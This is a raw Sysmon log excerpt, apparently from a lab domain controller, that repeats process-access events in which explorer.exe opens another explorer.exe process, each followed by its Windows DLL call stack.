22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 